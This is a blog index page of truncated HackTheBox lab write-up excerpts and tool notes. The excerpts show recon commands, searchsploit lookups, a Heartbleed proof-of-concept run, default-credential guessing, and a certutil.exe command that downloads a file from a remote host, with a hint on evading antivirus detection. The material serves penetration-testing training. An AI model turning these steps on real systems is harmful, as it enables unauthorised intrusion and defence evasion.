Pages

Search

HTB OpenAdmin

Enumeration $ nmap -A -T4 -p- 10.10.10.171 $ gobuster dir -u 10.10.10.171 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e Access to http://10.10.10.171 Access to http://10.10.10.171/music There is a login link. Click and you’ll be redirected to http://10.10.10.171/ona Based on this screenshot, we have an OpenNetAdmin (v18.1.1) Access to http://10.10.10.171/sierra Access to http://10.10.10.171/artwork Vulnerability analysis $ searchsploit opennetadmin $ searchsploit -x 47691 The -d option in Curl means data. -d, –data: (HTTP MQTT) Sends the specified data in a POST

HTB Friendzone

$ sudo nmap -A -T4 -p- 10.10.10.123 $ gobuster -w /usr/share/wordlists/dirb/common.txt dir -u http://10.10.10.123/ Access to http://10.10.10.123 Acess to https://10.10.10.123/ We discovered that SSL cert is using a common name as friendzone.red (it is a vhost).So we can access then to https://friendzone.red/ (after this host was added to the /etc/host file) We can do a zone transfer for that domain I saw earlier on the main page and get the

HTB Access

$ nmap -A -T4 -p- 10.10.10.98 Open ports detected:• 21/tcp open ftp Microsoft ftpd• 23/tcp open telnet?• 80/tcp open http Microsoft IIS httpd 7.5 $ ftp 10.10.10.98 ftp> dir ftp> cd Backupsftp> dir ftp> get backup.mdb ftp> cd ..ftp> dir ftp> cd Engineerftp> dir ftp> get «Access Control.zip» Files haven’t been correctly downloaded.By default, ftp mode set for text files.We need to download again this files but this time using

Impacket installation

Impacket is a collection of Python classes for working with network protocols. https://github.com/SecureAuthCorp/impacket Installation process: Download last release. Extract the file. Install the requirements. Install the package. $ pip install -r requirements.txt If we have an error installing wheel package, we can do it individually. $ pip install wheel Now run the configuration script. $ python setup.py bdist_wheel Let’s try to install the requirements again: $ pip install -r requirements.txt

Download a file using Certutil.exe

Certutil.exe can be used to download a file to a Windows machine. This command will download the «file» in the Windows machine from «http://<ip>« certutil.exe -urlcache -split -f http:///file file Depending on the file, it could be detected as malicious and then be blocked. A possible solution may be using the method described in this post from https://www.bleepingcomputer.com. The trick is based on a base64 encoding file when sending the

Autorecon install

AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services. It is intended as a time-saving tool for use in CTFs and other penetration testing environments (e.g. OSCP). It may also be useful in real-world engagements. https://github.com/Tib3rius/AutoRecon Run installation script $ python3 -m pip install git+https://github.com/Tib3rius/AutoRecon.git Add /home/ruben/.local/bin to your PATH. Other requirements installation: & sudo apt install seclists curl enum4linux gobuster nbtscan nikto nmap onesixtyone oscanner

HTB Active

$ sudo nmap -A -T4 -p- 10.10.10.100 Let’s enumerate SMB resources using SMBMap. $ smbmap -H 10.10.10.100 $ smbclient //10.10.10.100/Replication smb: > dir This share seems to be a copy of the SYSVOL’s. According to the information found in: Finding Passwords in SYSVOL & Exploiting Group Policy Preferences Attack Methods for Gaining Domain Admin Rights in Active Directory We need to find a file as groups.xml, scheduledtasks.xml and Services.xml where

HTB Sense

$ nmap -A -T4 -p- sense.htb $ gobuster dir -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e We need to skip SSL certificate verification using -k option. $ gobuster dir -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e -k $ gobuster dir -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k -x .txt We’ve found 2 text documents. changelog.txt system-users.txt Company defaults?As we have a PfSense site, we can try with default Pfsense password (pfsense) Access to http://10.10.10.60 This

HTB Valentine

$ sudo nmap -T4 -A -p- 10.10.10.79 $ gobuster dir -u https://10.10.10.79 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e -k $ nikto -h 10.10.10.79 $ sudo nmap –script vuln -p 80 10.10.10.79 $ sudo nmap –script vuln -p 443 10.10.10.79 Based on these results, this box is Heartbleed vulnerable. https://github.com/sensepost/heartbleed-poc $ python heartbleed-poc.py 10.10.10.79 $ strings dump.bin Using https://www.base64decode.org/ aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==heartbleedbelievethehype Access to https://10.10.10.79/dev https://10.10.10.79/dev/notes.txt https://10.10.10.79/dev/hype_key This is hexadecimal encoding. If we use a hexa

HTB Shocker

ruben@kali:~/htb$ sudo nmap -T4 -sV -p- shocker.htb We just have an Apache on port 80 and OpenSSH on port 2222. Access to http://shocker.htb ruben@kali:~/htb$ gobuster dir -u http://shocker.htb -w /usr/share/wordlists/dirb/common.txt -e We have a cgi-bin folder that may contain script files. Let’s use again Gobuster but this time searching files by file type.(.sh,.py) $ gobuster dir -u http://shocker.htb/cgi-bin -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e -x py -x sh Based on the box name